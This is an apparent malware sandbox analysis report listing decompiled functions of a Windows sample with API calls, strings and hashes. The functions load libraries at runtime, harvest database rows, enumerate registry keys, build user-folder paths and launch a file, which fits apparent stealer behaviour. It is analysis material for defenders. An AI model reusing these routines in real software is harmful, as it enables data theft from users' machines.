Opcode Fuzzy Hash: 79a77e92f1a754c41c7a61d504a6995133a2ec26633485cc660dbe2cd85e25cc
Instruction Fuzzy Hash: 7C814AB5D10208ABEB04DFD4C885BEEBBB5FB48300F14C15AE615AB394D3349A81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405B00, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 178
stringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00405B00(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char* _v1116;
				char* _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				char _v1136;
				intOrPtr _v1140;
				char _t56;
				char _t66;
				void* _t69;
				void* _t73;
				void* _t77;
				void* _t81;
				void* _t83;
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t120;
				void* _t126;
				void* _t127;

				_t56 = E0040C090(_a4, "|",  &_v1076);
				_t127 = _t126 + 0xc;
				_v1072 = _t56;
				_v8 = 1;
				E0040B720( &_v804, 0x104);
				E0040B720( &_v1068, 0x104);
				E0040B720( &_v540, 0x104);
				E0040B720( &_v276, 0x104);
				while(_v1072 != 0) {
					_v1140 = _v8;
					if(_v1140 == 1) {
						 *0x41aa24( &_v804, _v1072);
					} else {
						if(_v1140 == 2) {
							 *0x41aa24( &_v1068, _v1072);
							_t69 = E0040BF50( &_v1068, __eflags, 0x1a);
							_t117 =  *0x41a574; // 0x6276c8
							 *0x41aac8( &_v540, E0040BEB0( &_v1068, _t117, _t69));
							_t73 = E0040BF50( &_v540, __eflags, 0x1c);
							_t118 =  *0x41a518; // 0x627890
							 *0x41aac8( &_v540, E0040BEB0( &_v540, _t118, _t73));
							_t77 = E0040BF50( &_v540, __eflags, 0x28);
							_t119 =  *0x41a2f8; // 0x6276e0
							 *0x41aac8( &_v540, E0040BEB0( &_v540, _t119, _t77));
							_t81 = E0040BF50( &_v540, __eflags, 0x10);
							_t120 =  *0x41a494; // 0x6277b8
							_t83 = E0040BEB0( &_v540, _t120, _t81);
							_t127 = _t127 + 0x40;
							 *0x41aac8( &_v540, _t83);
						} else {
							if(_v1140 == 3) {
								 *0x41aa24( &_v276, _v1072);
								E004049E0( &_v540,  &_v804,  &_v540);
								_t127 = _t127 + 8;
								E0040B6E0( &_v540,  &_v1136, 0, 0x3c);
								_v1136 = 0x3c;
								_v1132 = 0;
								_v1128 = 0;
								_t110 =  *0x41a694; // 0x622cd0
								_v1124 = _t110;
								_v1120 =  &_v540;
								_v1116 =  &_v276;
								_v1112 = 0;
								_v1108 = 5;
								_v1104 = 0;
								 *0x41aa84( &_v1136);
								E0040B6E0( &_v1136,  &_v1136, 0, 0x3c);
								E0040B720( &_v1068, 0x104);
								E0040B720( &_v540, 0x104);
								E0040B720( &_v276, 0x104);
								E0040B720( &_v804, 0x104);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t66 = E0040C090(0, "|",  &_v1076);
					_t127 = _t127 + 0xc;
					_v1072 = _t66;
				}
				return E0040B720( &_v1072, 4);
			}

0x00405b19
0x00405b1e
0x00405b21
0x00405b27
0x00405b3a
0x00405b4b
0x00405b5c
0x00405b6d
0x00405b72
0x00405b82
0x00405b8f
0x00405bba
0x00405b91
0x00405b98
0x00405bd3
0x00405bdb
0x00405be4
0x00405c02
0x00405c0a
0x00405c13
0x00405c31
0x00405c39
0x00405c42
0x00405c60
0x00405c68
0x00405c71
0x00405c7f
0x00405c84
0x00405c8f
0x00405b9a
0x00405ba1
0x00405ca8
0x00405cbc
0x00405cc1
0x00405ccf
0x00405cd4
0x00405cde
0x00405ce8
0x00405cf2
0x00405cf8
0x00405d04
0x00405d10
0x00405d16
0x00405d20
0x00405d2a
0x00405d3b
0x00405d4c
0x00405d5d
0x00405d6e
0x00405d7f
0x00405d90
0x00405d95
0x00405d95
0x00405ba1
0x00405b98
0x00405da2
0x00405db3
0x00405db8
0x00405dbb
0x00405dbb
0x00405dd7

APIs

lstrcat.KERNEL32(?,00000000), ref: 00405BBA
lstrcat.KERNEL32(?,00000000), ref: 00405BD3

Part of subcall function 0040BF50: SHGetFolderPathA.SHELL32(00000000,0040619E,00000000,00000000,?,?,000003E8), ref: 0040BF7B

Part of subcall function 0040BEB0: StrStrA.SHLWAPI(006276C8,?,?,004061B1,?,006276C8,00000000), ref: 0040BEBE

lstrcpy.KERNEL32(?,00000000), ref: 00405C02

Part of subcall function 0040BEB0: lstrcpyn.KERNEL32(0041AC88,006276C8,006276C8,?,004061B1,?,006276C8), ref: 0040BEE2
Part of subcall function 0040BEB0: wsprintfA.USER32 ref: 0040BF3B

lstrcpy.KERNEL32(?,00000000), ref: 00405C31
lstrcpy.KERNEL32(?,00000000), ref: 00405C60
lstrcpy.KERNEL32(?,00000000), ref: 00405C8F

Strings

<, xrefs: 00405CD4
vb, xrefs: 00405C42

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcpy$lstrcat$FolderPathlstrcpynwsprintf
String ID: <$vb
API String ID: 2415926151-2522409725
Opcode ID: 747730083efd5928e2e27fe322c6f8ad2ed5ef5884fc777b8ac9b0fedd14d06d
Instruction ID: badc1f77fbd681f1876fa2e3389a3849b2e9868718c133fb1f617daaf3b8e41a
Opcode Fuzzy Hash: 747730083efd5928e2e27fe322c6f8ad2ed5ef5884fc777b8ac9b0fedd14d06d
Instruction Fuzzy Hash: D86114F190021CABD715EB60DC85FDE7378AB58304F0445AAF309A6191DB796B88CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B000, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040B000() {
				void* _v8;
				int _v16;
				int _v20;
				struct _MEMORYSTATUSEX _v84;
				void* _t18;
				int _t27;

				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 = memset( &_v84, 0, 0x40);
				_v84.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v84);
				if(_t18 != 1) {
					_v20 = 0;
					_v16 = 0;
				} else {
					_t27 = _v84.ullAvailPhys;
					_v20 = E00413940(_v84.ullTotalPhys, _t27, 0x100000, 0);
					_v16 = _t27;
				}
				_push(_v16);
				wsprintfA(_v8, "%d MB", _v20);
				return _v8;
			}

0x0040b01a
0x0040b025
0x0040b02b
0x0040b036
0x0040b03f
0x0040b05d
0x0040b064
0x0040b041
0x0040b048
0x0040b055
0x0040b058
0x0040b058
0x0040b06e
0x0040b07c
0x0040b08b

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B00D
RtlAllocateHeap.NTDLL(00000000), ref: 0040B014
memset.NTDLL ref: 0040B025
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0040B036
__aulldiv.LIBCMT ref: 0040B050
wsprintfA.USER32 ref: 0040B07C

Strings

@, xrefs: 0040B02B
%d MB, xrefs: 0040B073

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatus__aulldivmemsetwsprintf
String ID: %d MB$@
API String ID: 3391354518-3474575989
Opcode ID: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction ID: d6dd67dfb3d0438e7a0ae41fe93027642831ff50444b6176823616896e2162a9
Opcode Fuzzy Hash: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction Fuzzy Hash: 7F01A9B1D40208ABDB00DFE4DD49BEFB7B8FB48701F108559F615AB280D7B99A118B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407060, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407060() {
				CHAR* _t1;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0x41a6a4; // 0x626fc0
				 *0x41a82c = LoadLibraryA(_t1);
				if( *0x41a82c == 0) {
					return 0;
				}
				_t18 =  *0x41a4d0; // 0x6280c8
				_t24 =  *0x41a82c; // 0x0
				 *0x41a830 = GetProcAddress(_t24, _t18);
				_t5 =  *0x41a0ec; // 0x628d40
				_t19 =  *0x41a82c; // 0x0
				 *0x41a7e8 = GetProcAddress(_t19, _t5);
				_t25 =  *0x41a43c; // 0x628350
				_t7 =  *0x41a82c; // 0x0
				 *0x41a804 = GetProcAddress(_t7, _t25);
				_t20 =  *0x41a41c; // 0x628f40
				_t26 =  *0x41a82c; // 0x0
				 *0x41a820 = GetProcAddress(_t26, _t20);
				_t10 =  *0x41a454; // 0x628e60
				_t21 =  *0x41a82c; // 0x0
				 *0x41a808 = GetProcAddress(_t21, _t10);
				_t27 =  *0x41a684; // 0x628140
				_t12 =  *0x41a82c; // 0x0
				 *0x41a834 = GetProcAddress(_t12, _t27);
				_t22 =  *0x41a570; // 0x628de0
				_t28 =  *0x41a82c; // 0x0
				 *0x41a810 = GetProcAddress(_t28, _t22);
				_t15 =  *0x41a6f8; // 0x628e80
				_t23 =  *0x41a82c; // 0x0
				 *0x41a818 = GetProcAddress(_t23, _t15);
				return 1;
			}

0x00407063
0x0040706f
0x0040707b
0x00000000
0x0040714b
0x00407081
0x00407088
0x00407095
0x0040709a
0x004070a0
0x004070ad
0x004070b2
0x004070b9
0x004070c5
0x004070ca
0x004070d1
0x004070de
0x004070e3
0x004070e9
0x004070f6
0x004070fb
0x00407102
0x0040710e
0x00407113
0x0040711a
0x00407127
0x0040712c
0x00407132
0x0040713f
0x00000000

APIs

LoadLibraryA.KERNEL32(00626FC0,?,0040A721,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 00407069
GetProcAddress.KERNEL32(00000000,006280C8), ref: 0040708F
GetProcAddress.KERNEL32(00000000,00628D40), ref: 004070A7
GetProcAddress.KERNEL32(00000000,00628350), ref: 004070BF
GetProcAddress.KERNEL32(00000000,00628F40), ref: 004070D8
GetProcAddress.KERNEL32(00000000,00628E60), ref: 004070F0
GetProcAddress.KERNEL32(00000000,00628140), ref: 00407108
GetProcAddress.KERNEL32(00000000,00628DE0), ref: 00407121
GetProcAddress.KERNEL32(00000000,00628E80), ref: 00407139

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction ID: 2672694bce1a196fb14c5d12644c19629fc0bc7f4ce699a9cda348cbaa83b162
Opcode Fuzzy Hash: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction Fuzzy Hash: 64210DB56262009FC344EBB8ED889B637E9B74C315711C53AE505C3261D635A462CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00408650, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408650(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v8;
				char _v276;
				char _v280;
				char _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v276, 0x104);
				_t30 =  *0x41a418; // 0x628f80
				wsprintfA( &_v276, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v8);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a790; // 0x622710
					_t35 =  *0x41a7e8(_v8, _t67, 0xffffffff,  &_v280, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v280);
						return  *0x41a834(_v8);
					}
					_v284 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v280);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v280, 0);
						_t48 =  *0x41a820(_v280, 1);
						_t76 = _t79 + 0x10;
						_v292 = _t48;
						 *0x41aa24(_v284, _v288);
						 *0x41aa24(_v284, "\n");
						 *0x41aa24(_v284, _v292);
						 *0x41aa24(_v284, "\n\n");
					}
					E004137E0(_a24,  &_v276, _v284,  *0x41a908(_v284));
					_t76 = _t79 + 0x10;
					E0040B720( &_v284, 4);
					goto L6;
				}
				return _t33;
			}

0x00408665
0x00408672
0x0040867f
0x00408690
0x00408696
0x0040869b
0x004086ac
0x004086b7
0x004086bd
0x004086c2
0x004087b2
0x004087b9
0x00000000
0x004087cc
0x004086dc
0x004086e2
0x004086e9
0x004086ef
0x004086f5
0x00000000
0x00000000
0x0040870d
0x0040871c
0x00408722
0x00408725
0x00408739
0x0040874b
0x0040875f
0x00408771
0x00408771
0x0040879c
0x004087a1
0x004087ad
0x00000000
0x004087ad
0x004087d2

APIs

wsprintfA.USER32 ref: 0040867F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004086CF
RtlAllocateHeap.NTDLL(00000000), ref: 004086D6
lstrcat.KERNEL32(?,?), ref: 00408739
lstrcat.KERNEL32(?,00418BC4), ref: 0040874B
lstrcat.KERNEL32(?,?), ref: 0040875F
lstrcat.KERNEL32(?,00418BC0), ref: 00408771
lstrlen.KERNEL32(?), ref: 00408783

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: cbaa3a57402c93d3f6ac8d8f06c7d0ef17fa834f40e1eb2d1f60f83834225a72
Instruction ID: 955311191cc75421edc53ced7400f0f4475059767564ca96251eab490a2998f9
Opcode Fuzzy Hash: cbaa3a57402c93d3f6ac8d8f06c7d0ef17fa834f40e1eb2d1f60f83834225a72
Instruction Fuzzy Hash: 5F41A9B1900108ABCB14DBA4DD46FDA7778AF4C705F0085A9F70997141DB35DAA1CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409400, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409400(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v268, 0x104);
				_t30 =  *0x41a40c; // 0x628d20
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v272);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a08c; // 0x622780
					_t35 =  *0x41a7e8(_v272, _t67, 0xffffffff,  &_v276, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v276);
						return  *0x41a834(_v272);
					}
					_v280 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v276, 0);
						_t48 =  *0x41a820(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x41aa24(_v280, _v288);
						 *0x41aa24(_v280, "\t");
						 *0x41aa24(_v280, _v284);
						 *0x41aa24(_v280, "\n");
					}
					E004137E0(_a16,  &_v268, _v280,  *0x41a908(_v280));
					_t76 = _t79 + 0x10;
					E0040B720( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00409415
0x00409422
0x0040942f
0x00409443
0x00409449
0x0040944e
0x0040945f
0x0040946d
0x00409473
0x00409478
0x00409568
0x0040956f
0x00000000
0x00409585
0x00409492
0x00409498
0x0040949f
0x004094a5
0x004094ab
0x00000000
0x00000000
0x004094c3
0x004094d2
0x004094d8
0x004094db
0x004094ef
0x00409501
0x00409515
0x00409527
0x00409527
0x00409552
0x00409557
0x00409563
0x00000000
0x00409563
0x0040958b

APIs

wsprintfA.USER32 ref: 0040942F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00409485
RtlAllocateHeap.NTDLL(00000000), ref: 0040948C
lstrcat.KERNEL32(?,?), ref: 004094EF
lstrcat.KERNEL32(?,004191EC), ref: 00409501
lstrcat.KERNEL32(?,?), ref: 00409515
lstrcat.KERNEL32(?,00418BC4), ref: 00409527
lstrlen.KERNEL32(?), ref: 00409539

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 73554b27680e441b7f146b6b5ae22a03ed6891bd5a46cf62418f090caae84141
Instruction ID: 73f73464c9cdda0f85a8cd32dc3c754c459267de9915a2913d06030346bf418a
Opcode Fuzzy Hash: 73554b27680e441b7f146b6b5ae22a03ed6891bd5a46cf62418f090caae84141
Instruction Fuzzy Hash: B141BAB1900108ABCB14DFA4DD4AFDA77B8AF48705F0085A9F709D7141D675DEA0CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00408150, Relevance: 12.1, APIs: 8, Instructions: 107
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00408150(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				CHAR* _t30;
				void* _t33;
				void* _t35;
				void* _t41;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t79;

				E0040B720( &_v268, 0x104);
				_t30 =  *0x41a40c; // 0x628d20
				wsprintfA( &_v268, _t30, _a12, _a8);
				_t33 =  *0x41a830(_a4,  &_v272);
				_t75 = _t73 + 0x18;
				if(_t33 == 0) {
					_t67 =  *0x41a6ec; // 0x6268d0
					_t35 =  *0x41a7e8(_v272, _t67, 0xffffffff,  &_v276, 0);
					_t76 = _t75 + 0x14;
					if(_t35 != 0) {
						L6:
						 *0x41a808(_v276);
						return  *0x41a834(_v272);
					}
					_v280 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t41 =  *0x41a804(_v276);
						_t79 = _t76 + 4;
						if(_t41 != 0x64) {
							break;
						}
						_v288 =  *0x41a820(_v276, 0);
						_t48 =  *0x41a820(_v276, 1);
						_t76 = _t79 + 0x10;
						_v284 = _t48;
						 *0x41aa24(_v280, _v288);
						 *0x41aa24(_v280, "\t");
						 *0x41aa24(_v280, _v284);
						 *0x41aa24(_v280, "\n");
					}
					E004137E0(_a24,  &_v268, _v280,  *0x41a908(_v280));
					_t76 = _t79 + 0x10;
					E0040B720( &_v280, 4);
					goto L6;
				}
				return _t33;
			}

0x00408165
0x00408172
0x0040817f
0x00408193
0x00408199
0x0040819e
0x004081af
0x004081bd
0x004081c3
0x004081c8
0x004082b8
0x004082bf
0x00000000
0x004082d5
0x004081e2
0x004081e8
0x004081ef
0x004081f5
0x004081fb
0x00000000
0x00000000
0x00408213
0x00408222
0x00408228
0x0040822b
0x0040823f
0x00408251
0x00408265
0x00408277
0x00408277
0x004082a2
0x004082a7
0x004082b3
0x00000000
0x004082b3
0x004082db

APIs

wsprintfA.USER32 ref: 0040817F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004081D5
RtlAllocateHeap.NTDLL(00000000), ref: 004081DC
lstrcat.KERNEL32(?,?), ref: 0040823F
lstrcat.KERNEL32(?,004191EC), ref: 00408251
lstrcat.KERNEL32(?,?), ref: 00408265
lstrcat.KERNEL32(?,00418BC4), ref: 00408277
lstrlen.KERNEL32(?), ref: 00408289

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 857a99269bea2190ef1d5ef6c68e25cbade465b3303be24ebff5005b65543a5f
Instruction ID: b2019dcf8292433c89953b96a3eab70520c34c161fc81907ed19fb7541bb8629
Opcode Fuzzy Hash: 857a99269bea2190ef1d5ef6c68e25cbade465b3303be24ebff5005b65543a5f
Instruction Fuzzy Hash: 5141ABB19001089BCB14DFA4DD46FDA7778AF48705F0085A9F709D7141DA75DEA0CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B39D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040B39D() {
				long _t36;
				char* _t66;
				intOrPtr _t73;
				char* _t76;
				void* _t81;

				L0:
				while(1) {
					L0:
					 *(_t81 - 0xc1c) =  *(_t81 - 0xc1c) + 1;
					if( *((intOrPtr*)(_t81 - 0x814)) != 0) {
						break;
					}
					L2:
					 *(_t81 - 0x818) = 0x400;
					 *((intOrPtr*)(_t81 - 0x814)) = RegEnumKeyExA( *(_t81 - 0x810),  *(_t81 - 0xc1c), _t81 - 0x408, _t81 - 0x818, 0, 0, 0, 0);
					if( *((intOrPtr*)(_t81 - 0x814)) != 0) {
						L11:
						continue;
					} else {
						L3:
						_push(_t81 - 0x408);
						_t73 =  *0x41a230; // 0x6235c8
						_push(_t73);
						wsprintfA(_t81 - 0x808, "%s\%s");
						if(RegOpenKeyExA(0x80000002, _t81 - 0x808, 0, 0x20019, _t81 - 0x80c) == 0) {
							L5:
							 *(_t81 - 0x818) = 0x400;
							_t76 =  *0x41a71c; // 0x6294b0
							if(RegQueryValueExA( *(_t81 - 0x80c), _t76, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818) == 0) {
								L6:
								_push(_t81 - 0xc18);
								if( *0x41a908() > 1) {
									L7:
									 *0x41aa24( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									 *(_t81 - 0x818) = 0x400;
									_t66 =  *0x41a450; // 0x6295a0
									if(RegQueryValueExA( *(_t81 - 0x80c), _t66, 0, _t81 - 4, _t81 - 0xc18, _t81 - 0x818) == 0) {
										 *0x41aa24( *((intOrPtr*)(_t81 + 8)), " ");
										 *0x41aa24( *((intOrPtr*)(_t81 + 8)), _t81 - 0xc18);
									}
									L9:
									 *0x41aa24( *((intOrPtr*)(_t81 + 8)), "\n");
								}
							}
							L10:
							RegCloseKey( *(_t81 - 0x80c));
							goto L11;
						} else {
							L4:
							RegCloseKey( *(_t81 - 0x80c));
							_t36 = RegCloseKey( *(_t81 - 0x810));
						}
					}
					L13:
					return _t36;
					L14:
				}
				L12:
				_t36 = RegCloseKey( *(_t81 - 0x810));
				goto L13;
			}

0x0040b39d
0x0040b39d
0x0040b39d
0x0040b3a6
0x0040b3b3
0x00000000
0x00000000
0x0040b3b9
0x0040b3b9
0x0040b3ed
0x0040b3fa
0x0040b535
0x00000000
0x0040b400
0x0040b400
0x0040b406
0x0040b407
0x0040b40d
0x0040b41a
0x0040b445
0x0040b466
0x0040b466
0x0040b484
0x0040b49a
0x0040b4a0
0x0040b4a6
0x0040b4b0
0x0040b4b2
0x0040b4bd
0x0040b4c3
0x0040b4e1
0x0040b4f7
0x0040b502
0x0040b513
0x0040b513
0x0040b519
0x0040b522
0x0040b522
0x0040b4b0
0x0040b528
0x0040b52f
0x00000000
0x0040b447
0x0040b447
0x0040b44e
0x0040b45b
0x0040b45b
0x0040b445
0x0040b547
0x0040b54a
0x00000000
0x0040b54a
0x0040b53a
0x0040b541
0x00000000

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 0040B3E7
wsprintfA.USER32 ref: 0040B41A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000), ref: 0040B43D
RegCloseKey.ADVAPI32(00000000), ref: 0040B44E
RegCloseKey.ADVAPI32(00000000), ref: 0040B45B
RegQueryValueExA.ADVAPI32(00000000,006294B0,00000000,000F003F,?,00000400), ref: 0040B492
lstrlen.KERNEL32(?), ref: 0040B4A7
lstrcat.KERNEL32(?,?), ref: 0040B4BD
RegQueryValueExA.ADVAPI32(00000000,006295A0,00000000,000F003F,?,00000400), ref: 0040B4EF
lstrcat.KERNEL32(?,00419238), ref: 0040B502
lstrcat.KERNEL32(?,?), ref: 0040B513
lstrcat.KERNEL32(?,00418BC4), ref: 0040B522
RegCloseKey.ADVAPI32(00000000), ref: 0040B52F
RegCloseKey.ADVAPI32(00000000), ref: 0040B541

Strings

%s\%s, xrefs: 0040B40E

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Closelstrcat$QueryValue$EnumOpenlstrlenwsprintf
String ID: %s\%s
API String ID: 199769609-4073750446
Opcode ID: a4012638aad7033c914fdd1a0f1ca3e258b17949767a5016186a6d4b83d2670b
Instruction ID: 9546bb00d88ab29d98338f3d9e51bb631a883dd56483db4c703a054c40f4693a
Opcode Fuzzy Hash: a4012638aad7033c914fdd1a0f1ca3e258b17949767a5016186a6d4b83d2670b
Instruction Fuzzy Hash: 86110DB1901218ABDB20CB50DD45FE9B3B8FB48704F00C5E9A249A6181DB745AD6CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406130, Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 150
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406130(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				char _v552;
				char _v556;
				CHAR* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t62;
				char _t73;
				void* _t99;
				void* _t100;
				void* _t109;

				E0040B720( &_v540, 0x104);
				E0040B720( &_v276, 0x104);
				_t43 =  *0x41a200; // 0x627908
				_t76 =  &_v540;
				wsprintfA( &_v540, _t43, _a4);
				_t100 = _t99 + 0xc;
				_t114 = _a28;
				if(_a28 == 0) {
					_v8 = _a24;
				} else {
					_t73 = E00413730(0, 0x6400000, 0);
					_t100 = _t100 + 0xc;
					_v8 = _t73;
				}
				_t45 = E0040BF50(_t76, _t114, 0x1a);
				_t46 =  *0x41a574; // 0x6276c8
				 *0x41aac8( &_v276, E0040BEB0(_a12, _t46, _t45));
				_t49 = E0040BF50(_a12, _t114, 0x1c);
				_t50 =  *0x41a518; // 0x627890
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t50, _t49));
				_t53 = E0040BF50( &_v276, _t114, 0x28);
				_t54 =  *0x41a2f8; // 0x6276e0
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t54, _t53));
				_t57 = E0040BF50( &_v276, _t114, 0x10);
				_t58 =  *0x41a494; // 0x6277b8
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t58, _t57));
				_t62 = E0040C090(_a16, ",",  &_v548);
				_t109 = _t100 + 0x4c;
				_v544 = _t62;
				while(1) {
					_t115 = _v544;
					if(_v544 == 0) {
						break;
					}
					E00405E40( &_v276, _t115, _a4, _v8, 0x41401a,  &_v276, _v544, _a20, _a8, _a28, _a32);
					_t62 = E0040C090(0, ",",  &_v548);
